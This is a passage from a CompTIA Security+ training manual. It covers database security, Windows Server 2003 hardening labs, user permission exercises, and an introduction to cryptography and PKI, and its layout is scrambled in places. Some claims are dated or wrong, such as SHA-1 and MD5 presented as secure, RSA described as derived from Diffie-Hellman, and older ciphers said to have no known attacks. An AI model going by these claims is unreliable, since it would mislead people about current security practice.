Authentication of users and applications Its important to ensure that all users connecting to the database are legitimate users. Static passwords should be used as a minimum requirement for all connections. These passwords should be stored securely within the database in a strong encrypted format. Passwords should typically have a minimum length and should at least contain a combination of numbers and letters. A key element in database design is the process of determining access privileges for the users. This process is defined by the organizations business needs and security policies. Typically, each functional role within an organization has its corresponding access requirements. Job functions and the corresponding access items can be controlled by using the database roles, privileges, and standard database account security practices. The details of how to create roles and assign privileges to them are discussed at length in standard DBA manuals. A new form of architecture, called three-tier, requires an application server that holds and executes the application by using language such as Java to communicate with the workstation. The applications are executed on the server and communicate with the database. Typically, the workstation authenticates with the application server, and the application server authenticates with the database server. For the application to authenticate with the database, the application requires a user name and password (for a secure configured system). The user name and password should not be hard-coded into the application; therefore, some databases such as Oracle have mechanisms to get around this problem. These mechanisms, including such options as trust relationships, should be reviewed before implementation. Administration policies and procedures Efforts to secure organizational resources and data cannot succeed without the development of a written security policy. Using such policies, database administrators can align their efforts with that of the organization. Databases are increasingly becoming an integrated component of Web servers, Java applications, and other emerging technologies. Unmanaged security vulnerabilities within a database can lead to downtime, compromised system integrity, and lack of consumer confidence. Administration policies must clearly define how system and database patches are managed to ensure that all relevant patches are applied. Access control to objects and management of users can be simplified through the use of roles. A role is a collection of privileges that can be assigned to users. In addition to roles, profiles can be used to control allocation of database resources to users. Profiles can be used to prevent one user from performing an operation that might monopolize system resources and therefore deny access to other users. Many databases include default roles, which, if utilized, provide users with privileges that they do not require. Administration policies and procedures should ensure that default database roles are not used unless the capabilities of the roles are understood. Increasingly, database systems can be accessed through dial-up or Internet connections. Staff members who have left an organization constitute potential security risks. Policies and procedures within the organization should ensure that their access privileges are revoked in a timely manner to prevent the duplication or damage of data via remote connections.
Security baselines Initial configuration
1341
Certain database implementations, such as Oracles, have well-known default accounts and passwords that provide varying levels of access to data. During the initial configuration, these accounts should be disabled. A poorly configured database can be exploited to compromise an entire network. Such configuration flaws can provide an attacker with OS-level administration privileges that can be used to attack other network resources. An attacker can do this by gaining access to powerful built-in extended stored procedures. The database must be set up to prevent such exposure. For the database system to function correctly, the database system files must be installed and available. An attacker could crash a database or cause loss of data by removing such system files. Database system files must be set up with restricted Read and Write access so that an attacker cannot remove or modify these files. A security policy may require that all critical data files are stored in an encrypted format. Some databases support full database encryption, which adds another level of protection to the database. Auditing Most database implementations include many auditing features for database access and operations. In addition to database auditing features, changes to critical configuration files (such as the Oracle init file) should be logged to maintain a record of changes to the database. Auditing should take place for the following types of events: unsuccessful attempts to connect to the database; startup and shutdown of the database; viewing, modifying, or removing information from tables; creating or removing objects; and executing programs. Backup and recovery procedures Database corruption, accidental damage, and unauthorized or malicious activity can lead to huge losses without appropriate backup strategies. Backup and recovery procedures should be in place to minimize downtime and financial loss. Keeping information in the database up-to-date is critically important. Without backups and up-to-date information, organizations can suffer dramatic asset losses.

Do it!
C-4:
Directory services

1 List three directory-service-oriented threats.
Monitoring or spoofing user requests to the directory service. Connection hijacking. Directory data modification. Directory service spoofing. Denial of service.
2 The three authentication types used by LDAPv3 are _______, _________, and _______.
anonymous, simple, SASL
3 The initial accounts created when a database is installed are the most secure accounts to use for user access to the database. True or false?
False. The default accounts and passwords are well known, and provide varying levels of access to the data. These accounts should be disabled.
4 Database system files must be set up with restricted _____________ access so that an attacker cannot remove or modify these files.
Read/Write
Security baselines
1343
Topic D: Workstations and servers

# 3.1 Objective Understand security concerns and concepts of the following types of devices Workstations Servers 3.5 Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system OS / NOS (Operating System / Network Operating System) Hardening Updates (Hotfixes, Service Packs, Patches)
Securing computers
Explanation Covering all that needs to be done to completely secure a computer, whether a workstation or a server, is beyond the scope of this section. However, because basic workstation and server security is very similar, this discussion covers the general steps you should take. The following steps should ensure that your system is relatively secure: Remove any unnecessary protocols, such as NetBIOS or IPX, and services. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. As mentioned previously, completely securing a personal computer requires that the computer be either disconnected from all network and telecom systems or placed behind a properly designed and implemented firewall. For in-depth defense, install a personal firewall and antivirus package on your system.
Personal firewall software packages

Several packages, including Norton Firewall, ZoneAlarm, Black Ice Defender, Tiny Softwares Personal Firewall, and many others, offer firewall options through software. Most of the available packages offer application-level blocking, packet filtering, and can put your computer into stealth mode by turning off most if not all of your ports. Examining these packages in detail is beyond the scope of this section, but reviews of almost any package can be found on the Internet.
Antivirus software packages

As with personal firewall packages, there are many vendors of antivirus software including McAfee, Norton, Computer Associates, and many more. There are dozens of Web sites that review the variety of available software. Antivirus software is necessary even if you have a secure network, because a trusted connection might become infected with a worm or virus and transmit the same to your system.
1344 CompTIA Security+ Certification Hardening the Windows Server 2003 server
If you plan to use a software-based firewall such as Microsofts ISA server or Checkpoint Firewall-1, it is very important that you harden the server prior to installing the firewall software. Once the hardening process is complete, the server is known as a bastion host. The first step to hardening a server is to apply the latest service pack and all patches and hotfixes. In the following activity, you will Install Windows Server 2003 and apply the latest service pack and patches. Do it!
D-1:
Installing Windows Server 2003 service packs and hotfixes Heres why
If necessary.
Heres how
If time is limited, skip activities D-1 through D-4.
1 Log on to your server as Administrator 2 Insert the Windows Server 2003 CD-ROM Close the autorun window 3 Click Start Choose Run 4 Click Browse 5 Navigate to your CD-ROM drive 6 Double-click English 7 Double-click WIN2003 8 Double-click STANDARD 9 Double-click i386 10 Double-click WINNT32.exe 11 Click OK 12 From the Installation Type dropdown list, select New
Installation (Advanced)
To install Windows Server 2003.
If it appears.
To run the file. To select the installation type.
Click Next 13 Accept the license agreement and click Next 14 Enter the product key and click
Next
Security baselines 15 On the Setup Options window, click Advanced Options 16 Change the Windows installation folder to \Bastion Click OK 17 Click Next 18 If you are prompted to upgrade to NTFS, select Use the NTFS
file system (recommended) Otherwise, continue with step 19.
1345
Click Next 19 Select No, skip this step and

continue installing Windows The setup program will copy files and restart the computer.
Click Next
.
20 Press e 21 Press g 22 Select the C: drive for the partition Press e 23 Press C
To begin the text-based portion of the server setup. When prompted to repair. If your C: drive is low on space, you can choose another partition. To choose the partition. To continue. The setup program will copy and install files, and then the computer will restart. The GUI portion will then run.
24 In the Regional and Language Options screen, click Next 25 Enter your name and organization Click Next 26 Select Per Device or Per
User To specify the licensing mode.
Click Next

27 Enter BASTIONXX Enter password Click Next and then click Yes 28 If prompted, enter your area code Click Next 29 Adjust the date and time settings to your area Click Next 30 Select Custom settings Click Next 31 Clear all boxes except for the TCP/IP protocol Click Next 32 If you have a second NIC installed, clear all boxes except for the TCP/IP protocol Click Next 33 Click Next
To make this computer part of the workgroup WORKGROUP. Windows starts installing components and restarts the computer when finished. This process may take some time to complete. If you only have one NIC installed, proceed to the next step. Network installation begins. For your computer name, where XX is your student number. For the password. To accept the password. Otherwise, continue with step 29.
34 Log on as Administrator 35 At the Manage Your Server screen, check Dont display this page at logon and then close the screen 36 Open Internet Explorer 37 Select In the future, do not
show this message in the future If prompted.
Click OK
To close the warning message.
Security baselines 38 Choose Tools, Internet

Options
1347
39 Activate the Security tab Select Internet and move the slider to Medium Click Yes Click OK
Students may be prompted for information about their Internet connection.
To save the change.
Go to http://www.microsoft.com/security
Using Internet Explorer. If prompted, provide information regarding the computers connection to the Internet.
40 Download the latest Service Pack and hotfixes 41 Install the Service Pack 42 Install any additional hotfixes 43 Shut down the server
For Windows Server 2003.
Accept the license agreements and archive the files.
1348 CompTIA Security+ Certification System accounts database

Explanation If an intruder can gain physical access to a server, utilities such as L0phtCrack can be used to get a list of accounts and passwords. One way to prevent this is to encrypt the accounts database. Beginning with Windows NT SP3, Microsoft provides the syskey tool to encrypt the accounts database. Syskey will create a random 128-bit encryption key, which is then protected with the system key. This program also offers the option to store the key on a floppy disk, which requires that the floppy disk be inserted to start the system. While this makes a system very secure, it can also be dangerous because if the floppy disk is lost or corrupt, Windows will have to be reinstalled.
Do it!
D-2:
Protecting the system accounts database Heres why

This is the first entry in the boot record.
Heres how
If time is limited, skip this activity.
1 Boot to the bastion host 2 Log on as Administrator 3 Change the Administrator password to Pa$$word 4 Click Start Choose Run Enter syskey
Notice that the Encryption Disabled option is not available. Windows Server 2003 encrypts the accounts database by default.
5 Click Update 6 Select Password Startup 7 Enter password as the password Click OK Click OK
Youll be notified that the Account Database Startup Key was changed.
Security baselines
1349
Complex passwords and other security settings

Explanation Password policies are very important in any networking environment. All nodes and devices on the network need to be protected from an intrusion, and passwords are the first line of defense. However, a weak password is almost as bad as no password at all. For example, all networking devices have default passwords that are readily available. Failure to change these passwords is a common and major mistake. Organizations without a full time IT staff are usually guilty of this. Creating a complex password requirement is one of the steps in creating a bastion host. To really lock down a computer, you can then use bastion.inf, which is a security policy template file. The bastion.inf file has recommended security settings for a machine that resides in a DMZ and as such, will be separated from the network. You can apply bastion.inf using the Security Configuration and Analysis mmc snap-in.

Do it!
D-3:
Configuring passwords and other security settings Heres why
Heres how
If time is limited, skip this activity.
1 Restart the server 2 Boot to the bastion host 3 For the Startup password, enter
password
4 Log on to the bastion server as Administrator 5 Click Start 6 Choose Administrative Tools, Local Security Policy 7 Expand Account Policies Select Password Policy 8 Double-click Password must
meet complexity requirements
(The password is Pa$$word.)
9 Select Enabled Click OK 10 Try to change the Administrator password to password 11 Click Start, then choose Run Enter mmc 12 Choose File, Add/Remove
Snap-in To open a new management console window. It will fail.
13 Click Add 14 Select Security

Configuration and Analysis
Click Add Click Close 15 Click OK
Security baselines 16 In the mmc console, right-click

Security Configuration and Analysis
1351
Choose Open Database 17 Type Bastion db Click Open

Inform students where to find the bastion.inf file.
Youll create a new security information database called Bastion db.
18 Navigate to and select

bastion.inf
Click Open 19 Right-click Security

Configuration and Analysis
Choose Configure Computer

Now
20 Click OK 21 Close the mmc window Click Yes Enter Bastion as the File name 22 Click Save 23 Restart the computer 24 Enter password for the Startup password 25 Log on as root
To apply the bastion.inf security template.
To save the console.
Youll receive a message that this is a private system and that unauthorized use is prohibited. The password is Pa$$word. The bastion.inf security policy template changed the Administrator account to root.
26 Click Start and then choose

Run
Enter cmd 27 Enter ipconfig
To open a Command window. No IP address is assigned because the security settings have disabled the DHCP client. As such, the machine is now isolated from the network.
28 Close the command window
1352 CompTIA Security+ Certification Configuring advanced network settings

Explanation Most intrusion attempts will take place over a network connection. These intrusions are not limited to remote users and hackers. The local network can also be used to exploit a weakness. In the following activity, you will lock down TCP/IP by removing any unnecessary protocols.
Do it!
D-4:
Configuring advanced network settings Heres why
Heres how
If time is limited, skip this activity. Make sure students boot to the original server partition, not the bastion host.
1 Restart the computer and boot to the original server partition, not the bastion host 2 Log on as Administrator 3 Click Start and then right-click
My Computer The password is password.
Choose Properties 4 Activate the Hardware tab 5 Click Device Manager
6 Choose View, Show hidden

devices
7 Expand Non-Plug and Play

Drivers
Security baselines 8 Right-click NetBIOS over

Tcpip
1353
Select Uninstall and then click

OK
9 Click Yes
Make sure students dont boot to the bastion host.
To restart the computer. Dont boot to the bastion host.
10 Boot to the regular server partition and log on as Administrator 11 Click Start, then choose
Control Panel, Network Connections and right-click Local Area Connection
Choose Properties 12 Double-click Internet

Protocol (TCP/IP) To configure TCP/IP filters.
13 Click Advanced Select the WINS tab Select Disable NetBIOS over
TCP/IP
14 Click OK three times 15 Repeat this process for all network cards 16 Open a command window.
Disable DNS before students ping another server by the computer name.
NetBIOS is now disabled on this server.
17 Ping another server in the room using only the computer name. 18 Ping another server in the room using the servers IP address 19 Close all open windows
It will fail because NetBIOS is disabled on the server. The ping is successful.

Do it!
D-5:
Reviewing Windows Server 2003 security
Exercises
1 Which of the following is a broadcast-based protocol? A B
C
TCP UDP NetBIOS IP
2 Windows Server 2003 offers another level of TCP/IP protection by supporting which of the following? A
B
PGP IPSec EFS MD5
C D
3 What are the steps you should take to ensure that your system is relatively secure? A B C D E
F
Remove any unnecessary protocols such as NetBIOS or IPX. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. All of the above.
4 To configure TCP/IP filtering you will need to know which of the following? (Choose all that apply.)
A B
Protocol Port IP address Network-ID
C D
Security baselines
1355
Unit summary: Security baselines

Topic A In this topic, you learned how to harden the operating system and network operating system against attacks, malfunctions, and errors. You learned that removing unused applications and services, enforcing strong password and lockout policies, restricting access privileges, maintaining patches and updates, making regular backups, and logging all activities contribute to a more secure operating environment. You also learned how to harden the file system. You learned the significance of the principle of least privilege in restricting network access to a need-to-use basis. You also learned best practices in creating user accounts and groups, configuring access controls, implementing encryption, and installing system updates and patches. In this topic, you learned that network security can be maintained by timely firmware updates, by secure firewall and border router configuration, and by disabling unnecessary network services. Next, you identified the network services that are commonly exploited by attackers, including Remote Procedure Call (RPC), Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol (SNMP), and File Transfer Protocol (FTP). You also learned the best practices to safeguard these services against DoS attacks. In this topic, you learned that many applications that reside on networks are easy targets for attack. You learned that Web servers and other network devices, such as DNS servers, FTP servers, file and print servers, and DHCP servers, can be hardened against attack. You learned that best practices for hardening application servers include disabling unused services; maintaining current updates and patches; applying secure configurations; implementing strong encryption, authentication, and authorization; logging events; scanning for viruses; and making regular backups. In this topic, you learned how to protect workstations and servers using personal firewalls and antivirus software. You also learned how to harden the Windows Server 2003 server prior to installing firewall software using service packs, hotfixes, and registry modifications.
Topic B
Topic C
Topic D
Review questions
1 Describe OS/NOS hardening.
The process of modifying an operating systems default configuration to make it more secure from outside threats.
2 What is the purpose of the Microsoft Baseline Security Analyzer?

To scan local and remote machines for security issues with Microsoft Windows NT 4, Windows 2000, Windows Server 2003, Windows XP, IIS, SQL Server, Internet Explorer, and Office. Reports are generated with details after the scan is complete. In this activity, youll install MBSA and view the results.
3 What is the principle of least privilege?

Users should have the minimum amount of access needed to perform their jobs.
4 Windows Server 2003 only allows pre-defined security templates to be applied since administrator created security templates would leave the network vulnerable to attack. True or false?
False. The administrator can apply pre-made or custom made templates.

5 Encryption doesnt use many system resources, so it is the preferred method of securing a file system rather than using ACLs. True or false?
False
6 An administrator might choose to disable an application for which they have not yet obtained a security patch to address a security related problem that has been identified. True or false?
True
7 If an update is critical, you should skip the step of testing it in order to get the update installed as soon as possible. True or false?
False. While you could do this, you are putting the users systems at risk by doing so.
8 What is the trade-off for making systems easily accessible for customers and trade partners?
The easy accessibility makes them vulnerable to hackers and cyber terrorists.
9 Firmware is read-only, so cannot be upgraded. True or false?

False
10 Which is less receptive to attacks? A firewall with a static routing configuration or one with a dynamic routing configuration?
A static routing configuration is less receptive to attacks.
11 Which of the following are practices to follow when configuring routers and firewalls? (Choose all that apply.) A Allow IP-directed broadcasts through the system.
B C D
Configure devices with meaningful host names. Configure a loopback address. Restrict data traffic to required ports and protocols.
12 A(n) _________________ is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet.
Access Control List
13 Extrinsic information exists A Within a data packet

B
Outside of a data packet
C As a configurable parameter in a firewall D None of the above
Security baselines 14 Identify the term that each definition describes: Enhancements to an application.
Updates
1357
Fixes the bugs that are discovered after an application is released.

Hotfixes
Temporary fixes to a program.

Patches
Collections of fixes bundled together.

Service packs
15 Why is a Web server so vulnerable to attacks?

It is designed to make information accessible rather than to protect it.
16 How can an attacker circumvent firewall protection using e-mail protocols?

Most firewalls do not inspect e-mail and its contents.
17 FTP should only be deployed if there is a legitimate business need due to its insecure nature. True or false?
True
18 DNS servers are not vulnerable to DoS attacks. True or false?

False
19 List at least three steps you should take to ensure that your system is secure.
Remove unnecessary protocols, remove unnecessary user accounts, remove unnecessary shares, rename the administrator account, and use strong passwords.
20 List the steps to take in hardening a Windows Server 2003 server.

Apply service packs and hot fixes, protect the system accounts database, configure complex password requirements, and remove unnecessary protocols.

Creating users and groups Assume that you were hired by an attorney to help her secure her computers. Now she has two full-time assistants and three partners on board. In this project, youll create user accounts and groups for her. 1 First, create a matrix with user groups on one axis and categories of files on the other. For user groups, use Partners and Assistants. For simplicity, youll choose only three categories of files: Administrative and System Information, Case Data Files, and Sensitive Data.

2 To create new user accounts, click start, then right-click My Computer and choose Manage. In the Computer Management window that opens, expand the Local Users and Groups folder in the left-hand pane; then right-click on the Users folder, and choose New User. This opens a wizard that will guide you through the process of creating new user accounts. Follow the wizard to create Users 1 through 5 on your machine, each with their own passwords, as specified in the table below.
User 1 2 3 4 5 Username Katherine Joe Susan William Laura Group Assistants Assistants Partners Partners Partners Password User1User Sallyisgr8 cApe_coD str8Upthere o_U81_too
3 Create your two groups. From the Computer Management window, right-click the Groups folder in the left pane, and choose New Group. Name the group in the window that opens (according to the preceding table); then click the Add button. Specify or select users to add to this group (according to the preceding table). Follow this procedure to create and populate your second group. Assigning file permissions In this project, youll work with some folders. (The same procedure can be used for files.) 1 From Windows Explorer, create three folders under C:\: Administrative and System Information, Case Data Files, and Sensitive Data (again, this is primarily to keep things simple; normally there would be a lot more categories and folders than this). Here, youll apply permissions to these folders. 2 Right-click on any of the three folders you just created. Choose Properties from the shortcut menu, and activate the Security tab. 3 Click the Add button, and then specify or browse to and select (using the Advanced button) the groups you created to add them to the Name list. 4 Select each group from the Name list, one at a time, to apply appropriate permissions in the Permissions list, based on the matrix you created in the first project. 5 Do the same for the other two folders you created. 6 You can delete the folders that you created in this project, but save the user accounts and groups.
141
Unit 14 Cryptography
A Define the concepts of cryptography,
including algorithms, hashing, digital signatures, and digital certificates.

B Describe the Public Key Infrastructure
system.
C Explain key management and the
certificates life cycle.

D Install a certificate server.
142
Topic A: Concepts of cryptography

# 4.1 Objective Be able to identify and explain the following different kinds of cryptographic algorithms Hashing Symmetric Asymmetric 4.2 Understand how cryptography addresses the following security concepts Confidentiality Integrity Digital Signatures Authentication Non-Repudiation Digital Signatures Access Control 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates
Functions of cryptography
Explanation Cryptography is the process of converting readable text (plaintext) into unreadable series of characters and symbols (ciphertext). Cryptography allows users to transmit sensitive information over unsecured networks. Cryptography can be either strong or weak. The time and resources it takes to recover the plaintext measures the strength of a cryptographic method. Cryptography has four primary functions: Confidentiality Authentication Integrity Non-repudiation All are vital components in computer interaction. Confidentiality Confidentiality is often the most widely recognized component of cryptography. The primary purpose of early ciphers was to make sure that information was kept secret. When youre sending important data on a network, its of vital importance that the data remain confidential; otherwise, a company or organization could be giving away trade secrets or other information that could be damaging to the entity.
Cryptography Authentication
143
When data is being transferred, the receiver of a message should be able to verify the origin of that message. Without such authentication services, a data user would never know if the information received was from a legitimate sender or from a malicious attacker masquerading as a legitimate sender. Integrity The data in transit should also pass verification that it has not been tampered with or altered and that it maintains its integrity. Imagine what could happen if a sender sent his data via the network and a malicious third party intercepted the data. The third party could alter the data or add malicious code, such as a virus, and then send the information along to its intended recipient. Without encryption, the recipient would not be able to identify whether the integrity of the data was acceptable, and the recipient could very well use the corrupted data without even knowing it. Non-repudiation Another benefit of cryptography is non-repudiation, which means that the data sender cannot disavow that he or she did or did not send a certain piece of information.
Algorithms
Modern cryptography uses algorithms to encrypt and decrypt data. An algorithm is a set of instructions that works in tandem with a key. The same plaintext data encrypts into different ciphertext with different keys. The security of the data relies on two things: the strength of the algorithm and the secrecy of the key. Different algorithms offer different degrees of security. Determining whether or not an algorithm is sufficient depends on whether or not the cost of breaking the algorithm is greater than the value of the data, in terms of both time and resources needed. Modern cryptography employs two types of algorithms for encrypting and decrypting data: symmetric and asymmetric. The following table provides a quick comparison of the two types of algorithms. Its vital to understand how the two types differ and when you would use one type instead of the other.
Type Symmetric Advantages Single key Disadvantages Requires sender and receiver to agree on a key before transmission of data. Security of the algorithm lies solely with the key. High cost because dissemination of key information must be done over secure channels. Security of keys can be compromised when malicious users post phony keys. Slow method of encryption.
Asymmetric
Encryption and decryption keys are different. The decryption key cannot be calculated from the encryption key.
144
CompTIA Security+ Certification Symmetric algorithms Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key and vice versa. In most symmetric algorithms, the encryption and decryption keys are the same. These types of algorithms are also known as secretkey algorithms, single-key algorithms, or one-key algorithms, and they require the sender and receiver to agree on a key before they communicate securely. Therefore, the security of a symmetric algorithm lies with the key. If the key becomes known, anyone can access the encrypted information, as shown in Exhibit 14-1. Symmetric algorithms can be divided into two categories: stream algorithms and block algorithms. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits. Typical block sizes used in everyday computing today are 64 and 128 bits. This type of cryptography was once the only available way to transmit secret information. The obvious problem, of course, was the exchange of keysuntil the key is exchanged, encryption is impossible, but the value of the key makes its security critical. The solution is transmitting the private key over secure channels.
Exhibit 14-1: Encryption using a symmetric algorithm
Cryptography Asymmetric algorithms
145
In asymmetric algorithms, also known as public-key algorithms, the encryption key and the decryption key are different. Security of asymmetric algorithms is further enhanced by the fact that the decryption key cannot be calculated from the encryption key. Asymmetric algorithms allow for a given hosts encryption key to be made public. Anyone can use the key to encrypt data and send it to the host. However, only the host can decrypt the data by using a corresponding decryption key, as shown in Exhibit 14-2.
Exhibit 14-2: Encryption using an asymmetric algorithm Asymmetric algorithms allow users with no security policies to communicate securely. The need for sharing private keys over a secure channel (as with symmetric algorithms) is unnecessary. Some examples of asymmetric encryption are El Gamal, RSA (named for its inventors last names), and the Digital Signature Algorithm.
146
CompTIA Security+ Certification Common encryption algorithms Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. Feistel devised a set of parameters to use when creating algorithms for encryption purposes. The principles include: When youre creating ciphers, the larger the block size and key size, the more secure the cipher will be. Using multiple rounds offers increasing security. These concepts have to be balanced with the speed of the execution of the algorithm. With increased computing power, more complex algorithms can be used. The following common algorithms were all developed using this framework. This list is not an exhaustive list of algorithms in use, but it represents a sampling of the most widely known ciphers. Lucifer (1974)IBM developed Lucifer in response to requests for a strong encryption algorithm to be used to protect non-classified data. As the first-ever block cipher developed, it uses a 128-bit key and 16 rounds in the encryption process. Lucifer suffers from a weak key structure and is vulnerable to attacks, yet it still can be effective when used in tandem with other algorithms. Diffie-Hellman (1976)The Diffie-Hellman cipher, named after its developers, uses a public-key system (actually, the oldest public-key system still in use). It offers better performance than other encryption algorithms because its focused on the trading of a shared key between two users. Its commonly used in IPSec. RSA (1977)Named for its developers, Rivest, Shamir, and Adleman, the RSA algorithm is based on the Diffie-Helman cipher. RSA uses a public-key system with a variable key length and block size. RSA is a very flexible algorithm, but with greater key lengths and block sizes, it can be slow to compute in some environments. DES (1977)The Data Encryption Standard (DES) algorithm is a modified version of the Lucifer algorithm. DES was once the most widely used block cipher, and it used a 56-bit key length. In 1998, the Electronic Frontier Foundation cracked the DES algorithm, by using a specifically designed computer, in less than three days. This led to the development of Triple DES. Triple DES (1998)Triple DES uses the same algorithm as DES, but uses three keys and three executions of the algorithm to encrypt and decrypt data, resulting in a 168-bit key. Because of this, its three times slower than DES but much more secure. That said, with current computing capabilities, Triple DES is not foolproof. Triple DES is very easy to implement in encryption systems that currently use DES as their encryption algorithm. IDEA (1992)IDEA is a block cipher operating on 64-bit blocks and using a 128-bit key. The algorithm was developed by Xuejia Lai and James Massey, and its patented for corporate use by the Swiss firm Ascom. IDEA is commonly used in PGP and is a substitute for DES and Triple DES. There are no known attacks at this time for this algorithm. Blowfish (1993)Blowfish was developed as a free, unpatented cipher by Bruce Schneier. Its a 64-bit block cipher that uses variable-length keys. Blowfish is characterized by its ease of implementation, high execution speeds, and low memory usage. At this time, there are no known attacks for this algorithm.
Cryptography
147
RC5 (1995)RC5 was developed by Ronald Rivest for RSA Data Corporation. The RC5 algorithm was created to be suitable for either hardware or software functions. Like Blowfish, its very fast, its easy to implement, and it has low memory usage. RC5 uses a variable key length and a variable number of rounds; this makes it flexible and adaptable. At this time, there are no known attacks for this algorithm. The study of algorithms for use in encryption services continues to create new and improved ciphers. Its important to keep up-to-date on the latest developments, in terms of both new algorithms and new attacks for existing algorithms. Do it!
A-1:
Understanding encryption algorithms

1 Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key, and vice versa. True or false?
True
2 Symmetric algorithms are also known as public-key algorithms. True or false?

False. Asymmetric algorithms are known as public-key algorithms.
3 Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. True or false?
True
4 Provide the correct cipher name for each of the descriptions below: 128-bit key with a weak key structure 56-bit key length that is easily cracked 64-bit block cipher that uses variable-length keys Block cipher operating on a 64-bit blocks and using a 128-bit key Fast and easy to implement; no known attacks at this time Three keys and three executions, resulting in a 168-bit key Uses a public-key system, and variable key length and block size Uses a public-key system; commonly used in IPSec
Lucifer DES Blowfish IDEA RC5 Triple DES RSA Diffie-Hellman
148
Hashing
Explanation Hashing is critical to modern cryptography. Hash functions have been used in computer science for verification purposes for many years. Hashing involves taking a variablelength input and converting it to a fixed-length output string (called a hash value). This allows a user to identify whether or not the data received is the same as the data that was sent. If you want to verify that someone has a particular file that you also have, but you dont want it sent to you, you can ask for the hash value of that file. If the hash value sent corresponds to the hash value you have on the same file, you can be reasonably assured that its the same file. Hashing is used in modern cryptography to verify whether or not the data that is being sent over an unsecured channel is not changed in any way. If the data has been modified in any way, the hash value will be different, and the receiving party will know that the data has been corrupted or tampered with. The two most commonly used hash functions are SHA-1 (Secure Hash Algorithm 1), developed by the National Security Agency (NSA), and MD5 (Message Digest algorithm version 5), a product of RSA Security. SHA-1 is considered the more secure of the two algorithms.
Digital signatures
Most public-key algorithms have the useful feature that the public key can decrypt a message encrypted with the private key, as well as the reverse, which is the typical method to ensure privacy. If a public key can successfully decrypt a message, then the only person who could have done the encryption is the holder of the corresponding private key. This application of asynchronous encryption is known as a digital signature. A digital signature is created using a hash function. You perform a hash on the message to create a message digest, a shorter version of the message; then you encrypt the message digest by using your own private key. The digital signature is then appended to a plaintext or encrypted message. The recipient cannot open the digital signature unless the public key of the original sender matches the private key used to encrypt the message digest. The basic process by which a message is encrypted using a digital certificate and then verified by the recipient is as follows: 1 Alice produces a message digest by passing her message through a hashing algorithm. 2 The message digest is then encrypted using Alices private key. 3 Alice sends the message to Bob. 4 Bob creates a message digest from the message, using the same hashing algorithm that Alice used; he then decrypts Alices signature digest by using Alices public key. 5 Bob compares the two message digests: one created by Alice and the other by himself. If the two match, he knows he has received a message from Alice and the message has not been altered. Exhibit 14-3 illustrates this process. The fact that the Bob can use Alices public key to recover the original message digest guarantees its integrity and provides nonrepudiation.
Cryptography
149
Exhibit 14-3: Digital signatures
When using public-key cryptography, users should be aware that theyre sending information encrypted with the recipients public key. Malicious users, however, can post a phony key with the name and identification of a potential recipient. If data is encrypted with this phony key, the data is readable only by the malicious user. The first instinct is to send encrypted data to only those keys that you know of firsthand. But what happens if you need to exchange vital information with someone youve never met? The best way to address this issue is to use digital certificates. Digital certificates simplify the task of verifying whether a public key belongs to its owner. A digital certificate acts in much the same way as a passport or drivers license: a trusted authority verifies your identity and then stamps or signs the certificate. If you receive a certificate along with encrypted information, you are guaranteed of the senders authenticity. Digital certificates, as specified in the X.509 certificate standard, contain the following information: Identifying information, such as the users name and identity, a unique serial number, and the validity dates for the life of the certificate. The public key of the certificate holder. The digital signature of the Certification Authority. This component validates the whole package. The CA attaches its signature to the certificate, vouching that the information within the certificate is true. The CA signature, in essence, binds the certificate holders identifying information to the public key, leaving no doubt as to who the true owner of the key is. Some applications for digital certificates include: Secure Web communicationsUse certificates with SSL/TLS protocols for authenticating and encrypting data passed between servers and clients. Secure Web sitesUse certificates to authenticate access to secure Web sites. Secure e-mailEnable Secure Multipurpose Internet Mail Extensions (S/MIME) services to add authentication and privacy to e-mail messages.

Do it!
A-2:
Understanding hashes, digital signatures, and certificates

1 Hashing takes a variable-length input and converts it to a fixed-length output string called a ______________. A B
C
ciphertext plaintext hash value public key
2 Which of the following are examples of a hash algorithm? (Choose all that apply.) A
B C
RSA MD5 SHA-1 All of the above
3 Hashing checks whether a message has been tampered with. True or false?
True
4 Digital signatures use a private key to encrypt a message digest. If the public key can decrypt the message, then authenticity, integrity, and non-repudiation are proven. True or false?
False. Just integrity and non-repudiation are guaranteed.
5 Digital certificates contain which of the following information? (Choose all that apply.)
A B
Users name and identity Validity dates for the life of the certificate Private key Public key CAs digital signature
C
D E
6 Digital certificates bind the users identity to the public key. True or false?
True
Cryptography
1411
Topic B: Public Key Infrastructure (PKI)

# 4.3 Objective Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates Certificate Policies Certificate Practice Statements Trust Models 4.4 Identify and be able to differentiate different cryptographic standards and protocols
Standardized public-key distribution

Explanation For small groups of people, its very easy to exchange e-mails containing personal public-key information. The task of exchanging keys, even among those known to you, becomes difficult as the peer group grows. This method of key exchange is known as manual public-key distribution, and its not altogether practical. As groups of users get bigger, the need for systems to provide key security, storage, and exchange mechanisms grows. In response to this need, the Public Key Infrastructure was developed, providing a standard for key generation, authentication, distribution, and storage.
Components
The PKI system establishes a framework for management of private keys and certificates, including defining who is responsible for authentication. PKI standards describe two key roles for validating the identity of the user and issuing the digital certificate: the Certificate Authority and the Registration Authority. In addition, each PKI system has at least one certificate server. Certificate Authority (CA) The Certificate Authority is a person or group who is responsible for issuing certificates to authorized users. The CA creates the certificate and then digitally signs it by using its own private key, thereby guaranteeing the authenticity of the certificate. In addition to certificate generation, the CA is responsible for storing and safeguarding the certificates. Registration Authority (RA) The Registration Authority (RA) is used to offload the work of the CAs. The RA acts as a middleman between the CA and the subscriber, accepting registrations for the CA, validating the subscribers identity, and distributing keys. The RA does not issue certificates on its own.

Certificate server A certificate server maintains a database (repository) that stores the certificates. Most certificate servers have some administrative functionality that enables a network administrator to set security policies to verify that only keys that meet certain criteria are stored.
Certificate policies and practice statements

